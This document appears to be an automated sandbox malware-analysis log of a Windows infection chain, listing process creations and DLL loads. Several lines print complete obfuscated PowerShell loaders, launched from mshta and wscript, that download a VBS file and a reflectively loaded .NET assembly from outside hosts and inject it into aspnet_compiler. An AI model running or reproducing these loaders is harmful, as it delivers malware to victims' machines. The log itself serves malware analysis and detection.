'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
